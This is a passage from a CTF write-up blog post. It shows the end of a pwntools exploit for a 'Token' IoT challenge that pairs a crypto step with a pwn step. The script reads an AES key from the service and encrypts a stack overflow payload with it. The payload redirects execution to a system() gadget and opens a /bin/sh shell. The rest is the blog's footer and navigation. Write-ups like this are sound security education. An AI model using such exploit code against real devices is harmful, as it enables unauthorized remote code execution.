    p <span class="token operator">=</span> qemu<span class="token punctuation">.</span>process<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">'-g'</span><span class="token punctuation">,</span><span class="token string">'1234'</span><span class="token punctuation">,</span><span class="token string">'-L'</span><span class="token punctuation">,</span><span class="token string">'./'</span><span class="token punctuation">,</span><span class="token string">'./token'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
    <span class="token comment"># p = qemu.process(['-L','./','./token'])</span>
<span class="token keyword">else</span><span class="token punctuation">:</span>
    p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">"localhost"</span><span class="token punctuation">,</span> <span class="token number">1337</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">encrypt_ecb</span><span class="token punctuation">(</span>plaintext<span class="token punctuation">,</span> key<span class="token punctuation">)</span><span class="token punctuation">:</span>
    cipher <span class="token operator">=</span> AES<span class="token punctuation">.</span>new<span class="token punctuation">(</span>key<span class="token punctuation">,</span> AES<span class="token punctuation">.</span>MODE_ECB<span class="token punctuation">)</span>
    padded_plaintext <span class="token operator">=</span> pad<span class="token punctuation">(</span>plaintext<span class="token punctuation">,</span> AES<span class="token punctuation">.</span>block_size<span class="token punctuation">)</span>
    ciphertext <span class="token operator">=</span> cipher<span class="token punctuation">.</span>encrypt<span class="token punctuation">(</span>padded_plaintext<span class="token punctuation">)</span>
    <span class="token keyword">return</span> ciphertext

key <span class="token operator">=</span> p<span class="token punctuation">.</span>recvn<span class="token punctuation">(</span><span class="token number">16</span><span class="token punctuation">)</span>
success<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"key: </span><span class="token interpolation"><span class="token punctuation">&#123;</span>key<span class="token punctuation">.</span><span class="token builtin">hex</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>

<span class="token comment"># .text:0040104C 18 00 C2 27                   addiu   $v0, $fp, 0x240+var_228</span>
<span class="token comment"># .text:00401050 25 20 40 00                   move    $a0, $v0                         # command</span>
<span class="token comment"># .text:00401054 7C 80 82 8F                   la      $v0, system</span>
<span class="token comment"># .text:00401058 25 C8 40 00                   move    $t9, $v0</span>
<span class="token comment"># .text:0040105C 09 F8 20 03                   jalr    $t9 ; system</span>

payload <span class="token operator">=</span> flat<span class="token punctuation">(</span>
    <span class="token string">b't='</span><span class="token punctuation">,</span>              <span class="token comment"># token</span>
    <span class="token string">b'A'</span><span class="token operator">*</span><span class="token number">20</span><span class="token punctuation">,</span>            <span class="token comment"># padding</span>
    <span class="token string">b'0000'</span><span class="token punctuation">,</span>            <span class="token comment"># stack pointer</span>
    p32<span class="token punctuation">(</span><span class="token number">0x40104c</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token comment"># return address</span>
    
    <span class="token string">b'&amp;t='</span><span class="token punctuation">,</span>             <span class="token comment"># token</span>
    <span class="token string">b'A'</span><span class="token operator">*</span><span class="token number">20</span><span class="token punctuation">,</span>            <span class="token comment"># padding</span>
    p32<span class="token punctuation">(</span><span class="token number">0x41410f</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token comment"># stack pointer (base of input_buf + offset to /bin/sh payload - offset from gadget)</span>
    
    <span class="token string">b'&amp;tz=1'</span>            <span class="token comment"># timezone</span>
<span class="token punctuation">)</span>

HEADER <span class="token operator">=</span> <span class="token string">b'LExxxxxGOxxxxxx'</span>
ciphertext <span class="token operator">=</span> encrypt_ecb<span class="token punctuation">(</span>payload<span class="token punctuation">,</span> key<span class="token punctuation">)</span>
total <span class="token operator">=</span> HEADER<span class="token operator">+</span>ciphertext<span class="token operator">+</span><span class="token string">b'AAAAAAAA/bin/sh\x00'</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>total<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


	  <div class="article-footer-copyright">
	Ciallo～(∠・ω< )⌒★
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2024/10/23/geekgame2024/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/09/04/羊城杯2024pwn/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-09-07 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/ctf/">ctf<span>52</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/ctf-writeup/">ctf writeup<span>52</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#iot"><span class="toc-article-text">iot</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Reboot-Misc"><span class="toc-article-text">Reboot(Misc)</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Sal-HardWare"><span class="toc-article-text">Sal(HardWare)</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Token-Pwn-Crypto"><span class="toc-article-text">Token(Pwn,Crypto)</span></a></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2025 nyyyddddn's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
